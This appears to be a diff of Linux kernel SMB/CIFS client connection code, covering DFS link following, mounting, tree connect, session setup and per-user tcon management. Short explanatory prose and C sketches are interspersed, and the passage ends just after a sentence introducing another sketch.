+-	if (IS_ERR(mnt_ctx->origin_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->origin_fullpath);
+-		mnt_ctx->origin_fullpath = NULL;
+-		goto out;
+-	}
+-
+-	/* Try all dfs root targets */
+-	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(root_tl);
+-	     tit; tit = dfs_cache_get_next_tgt(root_tl, tit)) {
+-		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->origin_fullpath + 1, tit);
+-		if (!rc) {
+-			mnt_ctx->leaf_fullpath = kstrdup(mnt_ctx->origin_fullpath, GFP_KERNEL);
+-			if (!mnt_ctx->leaf_fullpath)
+-				rc = -ENOMEM;
+-			break;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	return rc;
+-}
+-
+-static int __follow_dfs_link(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	kfree(mnt_ctx->leaf_fullpath);
+-	mnt_ctx->leaf_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
+-							  cifs_remap(cifs_sb));
+-	if (IS_ERR(mnt_ctx->leaf_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->leaf_fullpath);
+-		mnt_ctx->leaf_fullpath = NULL;
+-		goto out;
+-	}
+-
+-	/* Get referral from dfs link */
+-	rc = dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
+-			    cifs_remap(cifs_sb), mnt_ctx->leaf_fullpath + 1, NULL, &tl);
+-	if (rc)
+-		goto out;
+-
+-	/* Try all dfs link targets.  If an I/O fails from the currently connected DFS target with an
+-	 * error other than STATUS_PATH_NOT_COVERED (-EREMOTE), then retry it from other targets as
+-	 * specified in MS-DFSC "3.1.5.2 I/O Operation to Target Fails with an Error Other Than
+-	 * STATUS_PATH_NOT_COVERED."
+-	 */
+-	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(&tl);
+-	     tit; tit = dfs_cache_get_next_tgt(&tl, tit)) {
+-		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->leaf_fullpath + 1, tit);
+-		if (!rc) {
+-			rc = is_path_remote(mnt_ctx);
+-			if (!rc || rc == -EREMOTE)
+-				break;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	dfs_cache_free_tgts(&tl);
+-	return rc;
+-}
+-
+-static int follow_dfs_link(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-	int num_links = 0;
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	kfree(mnt_ctx->origin_fullpath);
+-	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
+-							    cifs_remap(cifs_sb));
+-	kfree(full_path);
+-
+-	if (IS_ERR(mnt_ctx->origin_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->origin_fullpath);
+-		mnt_ctx->origin_fullpath = NULL;
+-		return rc;
+-	}
+-
+-	do {
+-		rc = __follow_dfs_link(mnt_ctx);
+-		if (!rc || rc != -EREMOTE)
+-			break;
+-	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
+-
+-	return rc;
+-}
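
The do/while guard above relies on the comma operator: rc is reset to -ELOOP before every bound check, so exhausting the iteration budget reports a referral loop instead of the last -EREMOTE. A standalone sketch of the idiom, with a hypothetical try_once() callback and assuming the kernel's nesting bound of 8:

#include <errno.h>

#define MAX_NESTED_LINKS 8	/* assumed bound, mirroring the kernel's */

/* try_once() is hypothetical: it returns 0 on success, -EREMOTE to
 * chase another link, and any other negative value on a hard error. */
static int chase_links(int (*try_once)(void))
{
	int rc, num_links = 0;

	do {
		rc = try_once();
		if (!rc || rc != -EREMOTE)
			break;	/* done: success or a hard error */
	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);

	/* rc is -ELOOP here only if every attempt returned -EREMOTE */
	return rc;
}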
+-
+-/* Set up DFS referral paths for failover */
+-static void setup_server_referral_paths(struct mount_ctx *mnt_ctx)
+-{
+-	struct TCP_Server_Info *server = mnt_ctx->server;
+-
+-	mutex_lock(&server->refpath_lock);
+-	server->origin_fullpath = mnt_ctx->origin_fullpath;
+-	server->leaf_fullpath = mnt_ctx->leaf_fullpath;
+-	server->current_fullpath = mnt_ctx->leaf_fullpath;
+-	mutex_unlock(&server->refpath_lock);
+-	mnt_ctx->origin_fullpath = mnt_ctx->leaf_fullpath = NULL;
+-}
+-
+-int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	int rc;
+-	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	bool isdfs;
+-
+-	rc = is_dfs_mount(&mnt_ctx, &isdfs, &tl);
+-	if (rc)
+-		goto error;
+-	if (!isdfs)
+-		goto out;
+-
+-	/* proceed as DFS mount */
+-	uuid_gen(&mnt_ctx.mount_id);
+-	rc = connect_dfs_root(&mnt_ctx, &tl);
+-	dfs_cache_free_tgts(&tl);
+-
+-	if (rc)
+-		goto error;
+-
+-	rc = is_path_remote(&mnt_ctx);
+-	if (rc)
+-		rc = follow_dfs_link(&mnt_ctx);
+-	if (rc)
+-		goto error;
+-
+-	setup_server_referral_paths(&mnt_ctx);
+-	/*
+-	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+-	 * serverino. This prevents dentry revalidation from thinking the dentries are stale (ESTALE).
+-	 */
+-	cifs_autodisable_serverino(cifs_sb);
+-	/*
+-	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
+-	 * that have different prefix paths.
+-	 */
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	kfree(cifs_sb->prepath);
+-	cifs_sb->prepath = ctx->prepath;
+-	ctx->prepath = NULL;
+-	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
+-
+-out:
+-	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
+-	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
+-	if (rc)
+-		goto error;
+-
+-	free_xid(mnt_ctx.xid);
+-	return rc;
+-
+-error:
+-	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
+-	kfree(mnt_ctx.origin_fullpath);
+-	kfree(mnt_ctx.leaf_fullpath);
+-	mount_put_conns(&mnt_ctx);
+-	return rc;
+-}
+-#else
+-int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0;
+-	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
+-
+-	rc = mount_get_conns(&mnt_ctx);
+-	if (rc)
+-		goto error;
+-
+-	if (mnt_ctx.tcon) {
+-		rc = is_path_remote(&mnt_ctx);
+-		if (rc == -EREMOTE)
+-			rc = -EOPNOTSUPP;
+-		if (rc)
+-			goto error;
+-	}
+-
+-	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
+-	if (rc)
+-		goto error;
+-
+-	free_xid(mnt_ctx.xid);
+-	return rc;
+-
+-error:
+-	mount_put_conns(&mnt_ctx);
+-	return rc;
+-}
+-#endif
+-
+-/*
+- * Issue a TREE_CONNECT request.
+- */
+-int
+-CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+-	 const char *tree, struct cifs_tcon *tcon,
+-	 const struct nls_table *nls_codepage)
+-{
+-	struct smb_hdr *smb_buffer;
+-	struct smb_hdr *smb_buffer_response;
+-	TCONX_REQ *pSMB;
+-	TCONX_RSP *pSMBr;
+-	unsigned char *bcc_ptr;
+-	int rc = 0;
+-	int length;
+-	__u16 bytes_left, count;
+-
+-	if (ses == NULL)
+-		return -EIO;
+-
+-	smb_buffer = cifs_buf_get();
+-	if (smb_buffer == NULL)
+-		return -ENOMEM;
+-
+-	smb_buffer_response = smb_buffer;
+-
+-	header_assemble(smb_buffer, SMB_COM_TREE_CONNECT_ANDX,
+-			NULL /*no tid */ , 4 /*wct */ );
+-
+-	smb_buffer->Mid = get_next_mid(ses->server);
+-	smb_buffer->Uid = ses->Suid;
+-	pSMB = (TCONX_REQ *) smb_buffer;
+-	pSMBr = (TCONX_RSP *) smb_buffer_response;
+-
+-	pSMB->AndXCommand = 0xFF;
+-	pSMB->Flags = cpu_to_le16(TCON_EXTENDED_SECINFO);
+-	bcc_ptr = &pSMB->Password[0];
+-
+-	pSMB->PasswordLength = cpu_to_le16(1);	/* minimum */
+-	*bcc_ptr = 0; /* password is null byte */
+-	bcc_ptr++;              /* skip password */
+-	/* already aligned so no need to do it below */
+-
+-	if (ses->server->sign)
+-		smb_buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	if (ses->capabilities & CAP_STATUS32) {
+-		smb_buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-	}
+-	if (ses->capabilities & CAP_DFS) {
+-		smb_buffer->Flags2 |= SMBFLG2_DFS;
+-	}
+-	if (ses->capabilities & CAP_UNICODE) {
+-		smb_buffer->Flags2 |= SMBFLG2_UNICODE;
+-		length =
+-		    cifs_strtoUTF16((__le16 *) bcc_ptr, tree,
+-			6 /* max utf8 char length in bytes */ *
+-			(/* server len*/ + 256 /* share len */), nls_codepage);
+-		bcc_ptr += 2 * length;	/* convert num 16 bit words to bytes */
+-		bcc_ptr += 2;	/* skip trailing null */
+-	} else {		/* ASCII */
+-		strcpy(bcc_ptr, tree);
+-		bcc_ptr += strlen(tree) + 1;
+-	}
+-	strcpy(bcc_ptr, "?????");
+-	bcc_ptr += strlen("?????");
+-	bcc_ptr += 1;
+-	count = bcc_ptr - &pSMB->Password[0];
+-	be32_add_cpu(&pSMB->hdr.smb_buf_length, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, ses, smb_buffer, smb_buffer_response, &length,
+-			 0);
+-
+-	/* above now done in SendReceive */
+-	if (rc == 0) {
+-		bool is_unicode;
+-
+-		tcon->tid = smb_buffer_response->Tid;
+-		bcc_ptr = pByteArea(smb_buffer_response);
+-		bytes_left = get_bcc(smb_buffer_response);
+-		length = strnlen(bcc_ptr, bytes_left - 2);
+-		if (smb_buffer->Flags2 & SMBFLG2_UNICODE)
+-			is_unicode = true;
+-		else
+-			is_unicode = false;
+-
+-		/* skip service field (NB: this field is always ASCII) */
+-		if (length == 3) {
+-			if ((bcc_ptr[0] == 'I') && (bcc_ptr[1] == 'P') &&
+-			    (bcc_ptr[2] == 'C')) {
+-				cifs_dbg(FYI, "IPC connection\n");
+-				tcon->ipc = true;
+-				tcon->pipe = true;
+-			}
+-		} else if (length == 2) {
+-			if ((bcc_ptr[0] == 'A') && (bcc_ptr[1] == ':')) {
+-				/* the most common case */
+-				cifs_dbg(FYI, "disk share connection\n");
+-			}
+-		}
+-		bcc_ptr += length + 1;
+-		bytes_left -= (length + 1);
+-		strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
+-
+-		/* mostly informational -- no need to fail on error here */
+-		kfree(tcon->nativeFileSystem);
+-		tcon->nativeFileSystem = cifs_strndup_from_utf16(bcc_ptr,
+-						      bytes_left, is_unicode,
+-						      nls_codepage);
+-
+-		cifs_dbg(FYI, "nativeFileSystem=%s\n", tcon->nativeFileSystem);
+-
+-		if ((smb_buffer_response->WordCount == 3) ||
+-			 (smb_buffer_response->WordCount == 7))
+-			/* field is in same location */
+-			tcon->Flags = le16_to_cpu(pSMBr->OptionalSupport);
+-		else
+-			tcon->Flags = 0;
+-		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
+-	}
+-
+-	cifs_buf_release(smb_buffer);
+-	return rc;
+-}
+-
+-static void delayed_free(struct rcu_head *p)
+-{
+-	struct cifs_sb_info *cifs_sb = container_of(p, struct cifs_sb_info, rcu);
+-
+-	unload_nls(cifs_sb->local_nls);
+-	smb3_cleanup_fs_context(cifs_sb->ctx);
+-	kfree(cifs_sb);
+-}
+-
+-void
+-cifs_umount(struct cifs_sb_info *cifs_sb)
+-{
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct tcon_link *tlink;
+-
+-	cancel_delayed_work_sync(&cifs_sb->prune_tlinks);
+-
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	while ((node = rb_first(root))) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-		cifs_get_tlink(tlink);
+-		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-		rb_erase(node, root);
+-
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-		cifs_put_tlink(tlink);
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-	}
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	kfree(cifs_sb->prepath);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
+-#endif
+-	call_rcu(&cifs_sb->rcu, delayed_free);
+-}
+-
+-int
+-cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+-			struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-
+-	if (!server->ops->need_neg || !server->ops->negotiate)
+-		return -ENOSYS;
+-
+-	/* only send once per connect */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsGood &&
+-	    server->tcpStatus != CifsNew &&
+-	    server->tcpStatus != CifsNeedNegotiate) {
+-		spin_unlock(&server->srv_lock);
+-		return -EHOSTDOWN;
+-	}
+-
+-	if (!server->ops->need_neg(server) &&
+-	    server->tcpStatus == CifsGood) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-
+-	server->tcpStatus = CifsInNegotiate;
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = server->ops->negotiate(xid, ses, server);
+-	if (rc == 0) {
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsInNegotiate)
+-			server->tcpStatus = CifsGood;
+-		else
+-			rc = -EHOSTDOWN;
+-		spin_unlock(&server->srv_lock);
+-	} else {
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsInNegotiate)
+-			server->tcpStatus = CifsNeedNegotiate;
+-		spin_unlock(&server->srv_lock);
+-	}
+-
+-	return rc;
+-}
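
The function above is a small locked state machine: the status moves from NeedNegotiate to InNegotiate under srv_lock, the lock is dropped for the slow negotiate call, and the result is committed only after re-checking that nobody reset the state in between. A compact sketch of the same pattern using a pthread mutex and hypothetical names:

#include <pthread.h>

enum srv_status { SRV_NEED_NEGOTIATE, SRV_IN_NEGOTIATE, SRV_GOOD };

struct srv {
	pthread_mutex_t lock;
	enum srv_status status;
};

/* do_negotiate() is hypothetical and returns 0 on success. */
static int negotiate(struct srv *s, int (*do_negotiate)(struct srv *))
{
	int rc;

	pthread_mutex_lock(&s->lock);
	if (s->status == SRV_GOOD) {		/* someone else finished */
		pthread_mutex_unlock(&s->lock);
		return 0;
	}
	s->status = SRV_IN_NEGOTIATE;
	pthread_mutex_unlock(&s->lock);

	rc = do_negotiate(s);			/* slow path, lock dropped */

	pthread_mutex_lock(&s->lock);
	/* Commit only if no one reset the state while the lock was dropped. */
	if (s->status == SRV_IN_NEGOTIATE)
		s->status = rc ? SRV_NEED_NEGOTIATE : SRV_GOOD;
	pthread_mutex_unlock(&s->lock);
	return rc;
}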
+-
+-int
+-cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   struct nls_table *nls_info)
+-{
+-	int rc = -ENOSYS;
+-	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+-	bool is_binding = false;
+-
+-	spin_lock(&ses->ses_lock);
+-	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
+-		 __func__, ses->chans_need_reconnect);
+-
+-	if (ses->ses_status != SES_GOOD &&
+-	    ses->ses_status != SES_NEW &&
+-	    ses->ses_status != SES_NEED_RECON) {
+-		spin_unlock(&ses->ses_lock);
+-		return -EHOSTDOWN;
+-	}
+-
+-	/* only send once per connect */
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses)) {
+-		if (ses->ses_status == SES_NEED_RECON)
+-			ses->ses_status = SES_GOOD;
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		return 0;
+-	}
+-
+-	cifs_chan_set_in_reconnect(ses, server);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
+-
+-	if (!is_binding)
+-		ses->ses_status = SES_IN_SETUP;
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* update ses ip_addr only for primary chan */
+-	if (server == pserver) {
+-		if (server->dstaddr.ss_family == AF_INET6)
+-			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-		else
+-			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
+-	}
+-
+-	if (!is_binding) {
+-		ses->capabilities = server->capabilities;
+-		if (!linuxExtEnabled)
+-			ses->capabilities &= (~server->vals->cap_unix);
+-
+-		if (ses->auth_key.response) {
+-			cifs_dbg(FYI, "Free previous auth_key.response = %p\n",
+-				 ses->auth_key.response);
+-			kfree_sensitive(ses->auth_key.response);
+-			ses->auth_key.response = NULL;
+-			ses->auth_key.len = 0;
+-		}
+-	}
+-
+-	cifs_dbg(FYI, "Security Mode: 0x%x Capabilities: 0x%x TimeAdjust: %d\n",
+-		 server->sec_mode, server->capabilities, server->timeAdj);
+-
+-	if (server->ops->sess_setup)
+-		rc = server->ops->sess_setup(xid, ses, server, nls_info);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "Send error in SessSetup = %d\n", rc);
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_IN_SETUP)
+-			ses->ses_status = SES_NEED_RECON;
+-		spin_lock(&ses->chan_lock);
+-		cifs_chan_clear_in_reconnect(ses, server);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-	} else {
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_IN_SETUP)
+-			ses->ses_status = SES_GOOD;
+-		spin_lock(&ses->chan_lock);
+-		cifs_chan_clear_in_reconnect(ses, server);
+-		cifs_chan_clear_need_reconnect(ses, server);
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-	}
+-
+-	return rc;
+-}
+-
+-static int
+-cifs_set_vol_auth(struct smb3_fs_context *ctx, struct cifs_ses *ses)
+-{
+-	ctx->sectype = ses->sectype;
+-
+-	/* krb5 is special, since we don't need username or pw */
+-	if (ctx->sectype == Kerberos)
+-		return 0;
+-
+-	return cifs_set_cifscreds(ctx, ses);
+-}
+-
+-static struct cifs_tcon *
+-cifs_construct_tcon(struct cifs_sb_info *cifs_sb, kuid_t fsuid)
+-{
+-	int rc;
+-	struct cifs_tcon *master_tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon = NULL;
+-	struct smb3_fs_context *ctx;
+-
+-	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+-	if (ctx == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	ctx->local_nls = cifs_sb->local_nls;
+-	ctx->linux_uid = fsuid;
+-	ctx->cred_uid = fsuid;
+-	ctx->UNC = master_tcon->tree_name;
+-	ctx->retry = master_tcon->retry;
+-	ctx->nocase = master_tcon->nocase;
+-	ctx->nohandlecache = master_tcon->nohandlecache;
+-	ctx->local_lease = master_tcon->local_lease;
+-	ctx->no_lease = master_tcon->no_lease;
+-	ctx->resilient = master_tcon->use_resilient;
+-	ctx->persistent = master_tcon->use_persistent;
+-	ctx->handle_timeout = master_tcon->handle_timeout;
+-	ctx->no_linux_ext = !master_tcon->unix_ext;
+-	ctx->linux_ext = master_tcon->posix_extensions;
+-	ctx->sectype = master_tcon->ses->sectype;
+-	ctx->sign = master_tcon->ses->sign;
+-	ctx->seal = master_tcon->seal;
+-	ctx->witness = master_tcon->use_witness;
+-
+-	rc = cifs_set_vol_auth(ctx, master_tcon->ses);
+-	if (rc) {
+-		tcon = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	/* get a reference for the same TCP session */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	++master_tcon->ses->server->srv_count;
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	ses = cifs_get_smb_ses(master_tcon->ses->server, ctx);
+-	if (IS_ERR(ses)) {
+-		tcon = (struct cifs_tcon *)ses;
+-		cifs_put_tcp_session(master_tcon->ses->server, 0);
+-		goto out;
+-	}
+-
+-	tcon = cifs_get_tcon(ses, ctx);
+-	if (IS_ERR(tcon)) {
+-		cifs_put_smb_ses(ses);
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(ses))
+-		reset_cifs_unix_caps(0, tcon, NULL, ctx);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-out:
+-	kfree(ctx->username);
+-	kfree_sensitive(ctx->password);
+-	kfree(ctx);
+-
+-	return tcon;
+-}
+-
+-struct cifs_tcon *
+-cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb)
+-{
+-	return tlink_tcon(cifs_sb_master_tlink(cifs_sb));
+-}
+-
+-/* find and return a tlink with given uid */
+-static struct tcon_link *
+-tlink_rb_search(struct rb_root *root, kuid_t uid)
+-{
+-	struct rb_node *node = root->rb_node;
+-	struct tcon_link *tlink;
+-
+-	while (node) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-
+-		if (uid_gt(tlink->tl_uid, uid))
+-			node = node->rb_left;
+-		else if (uid_lt(tlink->tl_uid, uid))
+-			node = node->rb_right;
+-		else
+-			return tlink;
+-	}
+-	return NULL;
+-}
+-
+-/* insert a tcon_link into the tree */
+-static void
+-tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink)
+-{
+-	struct rb_node **new = &(root->rb_node), *parent = NULL;
+-	struct tcon_link *tlink;
+-
+-	while (*new) {
+-		tlink = rb_entry(*new, struct tcon_link, tl_rbnode);
+-		parent = *new;
+-
+-		if (uid_gt(tlink->tl_uid, new_tlink->tl_uid))
+-			new = &((*new)->rb_left);
+-		else
+-			new = &((*new)->rb_right);
+-	}
+-
+-	rb_link_node(&new_tlink->tl_rbnode, parent, new);
+-	rb_insert_color(&new_tlink->tl_rbnode, root);
+-}
+-
+-/*
+- * Find or construct an appropriate tcon given a cifs_sb and the fsuid of the
+- * current task.
+- *
+- * If the superblock doesn't refer to a multiuser mount, then just return
+- * the master tcon for the mount.
+- *
+- * First, search the rbtree for an existing tcon for this fsuid. If one
+- * exists, then check to see if it's pending construction. If it is then wait
+- * for construction to complete. Once it's no longer pending, check to see if
+- * it failed and either return an error or retry construction, depending on
+- * the timeout.
+- *
+- * If one doesn't exist then insert a new tcon_link struct into the tree and
+- * try to construct a new one.
+- */
+-struct tcon_link *
+-cifs_sb_tlink(struct cifs_sb_info *cifs_sb)
+-{
+-	int ret;
+-	kuid_t fsuid = current_fsuid();
+-	struct tcon_link *tlink, *newtlink;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		return cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+-
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
+-	if (tlink)
+-		cifs_get_tlink(tlink);
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	if (tlink == NULL) {
+-		newtlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
+-		if (newtlink == NULL)
+-			return ERR_PTR(-ENOMEM);
+-		newtlink->tl_uid = fsuid;
+-		newtlink->tl_tcon = ERR_PTR(-EACCES);
+-		set_bit(TCON_LINK_PENDING, &newtlink->tl_flags);
+-		set_bit(TCON_LINK_IN_TREE, &newtlink->tl_flags);
+-		cifs_get_tlink(newtlink);
+-
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-		/* was one inserted after previous search? */
+-		tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
+-		if (tlink) {
+-			cifs_get_tlink(tlink);
+-			spin_unlock(&cifs_sb->tlink_tree_lock);
+-			kfree(newtlink);
+-			goto wait_for_construction;
+-		}
+-		tlink = newtlink;
+-		tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-	} else {
+-wait_for_construction:
+-		ret = wait_on_bit(&tlink->tl_flags, TCON_LINK_PENDING,
+-				  TASK_INTERRUPTIBLE);
+-		if (ret) {
+-			cifs_put_tlink(tlink);
+-			return ERR_PTR(-ERESTARTSYS);
+-		}
+-
+-		/* if it's good, return it */
+-		if (!IS_ERR(tlink->tl_tcon))
+-			return tlink;
+-
+-		/* return error if we tried this already recently */
+-		if (time_before(jiffies, tlink->tl_time + TLINK_ERROR_EXPIRE)) {
+-			cifs_put_tlink(tlink);
+-			return ERR_PTR(-EACCES);
+-		}
+-
+-		if (test_and_set_bit(TCON_LINK_PENDING, &tlink->tl_flags))
+-			goto wait_for_construction;
+-	}
+-
+-	tlink->tl_tcon = cifs_construct_tcon(cifs_sb, fsuid);
+-	clear_bit(TCON_LINK_PENDING, &tlink->tl_flags);
+-	wake_up_bit(&tlink->tl_flags, TCON_LINK_PENDING);
+-
+-	if (IS_ERR(tlink->tl_tcon)) {
+-		cifs_put_tlink(tlink);
+-		return ERR_PTR(-EACCES);
+-	}
+-
+-	return tlink;
+-}
+-
+-/*
+- * periodic workqueue job that scans the tlink_tree of a superblock and
+- * closes out idle tlinks.
+- */
+-static void
+-cifs_prune_tlinks(struct work_struct *work)
+-{
+-	struct cifs_sb_info *cifs_sb = container_of(work, struct cifs_sb_info,
+-						    prune_tlinks.work);
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct rb_node *tmp;
+-	struct tcon_link *tlink;
+-
+-	/*
+-	 * Because we drop the spinlock in the loop in order to put the tlink,
+-	 * the walk is not guarded against removal of links from the tree. The only
+-	 * places that remove entries from the tree are this function and
+-	 * umounts. Because this function is non-reentrant and is canceled
+-	 * before umount can proceed, this is safe.
+-	 */
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	node = rb_first(root);
+-	while (node != NULL) {
+-		tmp = node;
+-		node = rb_next(tmp);
+-		tlink = rb_entry(tmp, struct tcon_link, tl_rbnode);
+-
+-		if (test_bit(TCON_LINK_MASTER, &tlink->tl_flags) ||
+-		    atomic_read(&tlink->tl_count) != 0 ||
+-		    time_after(tlink->tl_time + TLINK_IDLE_EXPIRE, jiffies))
+-			continue;
+-
+-		cifs_get_tlink(tlink);
+-		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-		rb_erase(tmp, root);
+-
+-		spin_unlock(&cifs_sb->tlink_tree_lock);
+-		cifs_put_tlink(tlink);
+-		spin_lock(&cifs_sb->tlink_tree_lock);
+-	}
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
+-				TLINK_IDLE_EXPIRE);
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-/* Update dfs referral path of superblock */
+-static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb_info *cifs_sb,
+-				  const char *target)
+-{
+-	int rc = 0;
+-	size_t len = strlen(target);
+-	char *refpath, *npath;
+-
+-	if (unlikely(len < 2 || *target != '\\'))
+-		return -EINVAL;
+-
+-	if (target[1] == '\\') {
+-		len += 1;
+-		refpath = kmalloc(len, GFP_KERNEL);
+-		if (!refpath)
+-			return -ENOMEM;
+-
+-		scnprintf(refpath, len, "%s", target);
+-	} else {
+-		len += sizeof("\\");
+-		refpath = kmalloc(len, GFP_KERNEL);
+-		if (!refpath)
+-			return -ENOMEM;
+-
+-		scnprintf(refpath, len, "\\%s", target);
+-	}
+-
+-	npath = dfs_cache_canonical_path(refpath, cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	kfree(refpath);
+-
+-	if (IS_ERR(npath)) {
+-		rc = PTR_ERR(npath);
+-	} else {
+-		mutex_lock(&server->refpath_lock);
+-		kfree(server->leaf_fullpath);
+-		server->leaf_fullpath = npath;
+-		mutex_unlock(&server->refpath_lock);
+-		server->current_fullpath = server->leaf_fullpath;
+-	}
+-	return rc;
+-}
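
A sizing detail in the helper above: sizeof("\\") is 2, one byte for the prepended backslash and one for the NUL terminator, while the UNC branch only adds 1 because the NUL alone needs room. A minimal userspace sketch of the same allocation arithmetic:

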